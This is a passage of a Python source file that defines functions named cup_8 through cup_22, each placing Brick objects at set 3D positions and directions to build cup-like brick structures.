brick_ = brick.Brick()
brick_.set_position([8, i * 4 + 2, 8 + j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 10, 5, 9 + j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([12, i * 2 + 4, 12])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 3, j * 8 + 1, 12])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([0, i * 4 + 3, 12])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([9, 5, 12])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([0, i * 4 + 4, 13 + j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 1, 1, 13 + j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 3, 9, 13 + j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([8, i * 4 + 2, 13 + j])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 0, 15])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 15 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 2, 10, 15 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([9, 9 - i * 2, 15 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([8 - i * 2, 0, 15 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_8():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 6])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 6 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 6 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 0, 8])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 8 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 8 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 8 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 8 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(3):
brick_ = brick.Brick()
brick_.set_position([2, i * 2 + 2, 4 - j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, 3, 1])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([2, i * 4 + 1, 1])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 0])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_9():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 4 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 4 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 4 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 4 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 0, 6])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 6 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 6 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 0, 8])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 8 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 8 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 8 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 8 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_10():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([i * 2, 10, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
brick_ = brick.Brick()
brick_.set_position([9, 9 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([8 - i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 10 - 1, j * 4 + 1, 7])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 2, j * 10, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([0, i * 4 + 3, 8])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([8, i * 8 + 1, 8])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 1, j * 10, 8])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([10, i * 2 + 4, 8])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([13, i * 2 + 4, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 11, 5, 6 - j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 3 + 11, 5, 4 - j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 11, 5, 2 - j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([13, i * 2 + 4, 0])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(3):
for k in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 10 - 1, j * 4 + 1, 4 - k])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 2, j * 10, 4 - k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2, j * 6 + 2, 1])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 10 - 1, j * 4 + 1, 0])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 2, j * 10, 0])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 1, 5, 0])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_11():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 4 - k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([2, i * 2 + 2, 2 - j])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_12():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([7, i * 2 + 2, 7 - 4 * j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([9, 3, 6 - i])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 3, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_13():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2, 4, 5 + (i % 2 == 0)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([3, 3 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 0, 6])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([5, 2, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([6, 2, 6])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([7, 2, 5])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([6, 2, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([5, 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 0, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 3, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 4, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([3, 1, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 2, 7])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([2, i * 4, 7])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2, 2, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_14():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 4 - k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([2, i * 2 + 2, 2 - j])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_15():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([7, i * 2 + 2, 7 - 4 * j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([9, 3, 6 - i])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 3, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 6, 7 - 4 * k])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 3, 7])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([2, i * 6, 2])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 6 - 1, 3, 2])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([2, i * 6, 8])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 6 - 1, 3, 8])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 6, 9 - 8 * k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 6 - 1, 3, 9 - 8 * j])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_16():
bricks_ = bricks.Bricks(100)
list_brick_ = []
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(5):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([j * 6 - 1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 10, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([1, 1, 7 - 3 * i])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([0, i * 4 + 4, 7 - 3 * j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([3, 9, 7 - 3 * i])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([4, i * 4 + 2, 7 - 3 * j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([2, i * 2 + 3, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_17():
bricks_ = bricks.Bricks(100)
list_brick_ = []
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([7, i * 2 + 1, 5 + (i % 2 == 1)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 1, j * 4 + 1, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(3):
brick_ = brick.Brick()
brick_.set_position([3, 2 * i + 2, 3 - j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2 + 1, j * 4 + 1, 0])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_18():
bricks_ = bricks.Bricks(100)
list_brick_ = []
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 0, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([j * 6 - 1, i * 2 + 1, 6 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([1, 1, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 4, 5])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([3, 5, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([4, 2, 5])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 6, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 6 - 1, 3, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([1, 1, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 4, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([3, 5, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([4, 2, 3])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 6, 2])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 2 - 1, 3, 2])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_19():
bricks_ = bricks.Bricks(100)
list_brick_ = []
for i in range(7):
brick_ = brick.Brick()
brick_.set_position([i * 2, 0, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(7):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([j * 14 - 1, i * 2 + 1, 6 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(7):
brick_ = brick.Brick()
brick_.set_position([i * 2, 14, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(4):
for j in range(2):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 14, 8 - 3 * k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(6):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 12, j * 2 + 2, 8 - 3 * k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(6):
brick_ = brick.Brick()
brick_.set_position([i * 8 + 2, j * 2 + 2, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(6):
brick_ = brick.Brick()
brick_.set_position([i * 4 + 4, j * 2 + 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([6, i * 14, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_20():
bricks_ = bricks.Bricks(100)
list_brick_ = []
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 0, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([j * 6 - 1, i * 2 + 1, 6 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 6 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
for k in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 6, 5 - k])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 6 - 1, 3, 5 - j])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_21():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([i * 2, 4, 5 + (i % 2 == 0)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([3, 3 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 0, 6])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([0, 0, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 3, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 4, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([3, 1, 4])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([1, i * 2 + 1, 3])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([0, 0, 2 - i])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([-1, 3, 2 - i])
brick_.set_direction(0)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([2, 4, 2 - i])
brick_.set_direction(1)
list_brick_.append(brick_)
brick_ = brick.Brick()
brick_.set_position([3, 1, 2 - i])
brick_.set_direction(0)
list_brick_.append(brick_)
for brick_ in list_brick_:
bricks_.add(brick_)
return bricks_
def cup_22():
bricks_ = bricks.Bricks(150)
list_brick_ = []
brick_ = brick.Brick()
brick_.set_position([0, 0, 5])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([-1, i * 2 + 1, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([i * 2, 6, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([5, 5 - i * 2, 5 + (i % 2 == 0)])
brick_.set_direction(0)
list_brick_.append(brick_)
for i in range(2):
brick_ = brick.Brick()
brick_.set_position([4 - i * 2, 0, 5 + (i % 2 == 1)])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(4):
brick_ = brick.Brick()
brick_.set_position([i * 4, j * 2, 4])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(2):
for j in range(2):
brick_ = brick.Brick()
brick_.set_position([7, i * 2 + 2, 7 - 4 * j])
brick_.set_direction(1)
list_brick_.append(brick_)
for i in range(3):
brick_ = brick.Brick()
brick_.set_position([9, 3, 6 - i])
brick_.set_direction(0)
list_brick_.append(brick_)
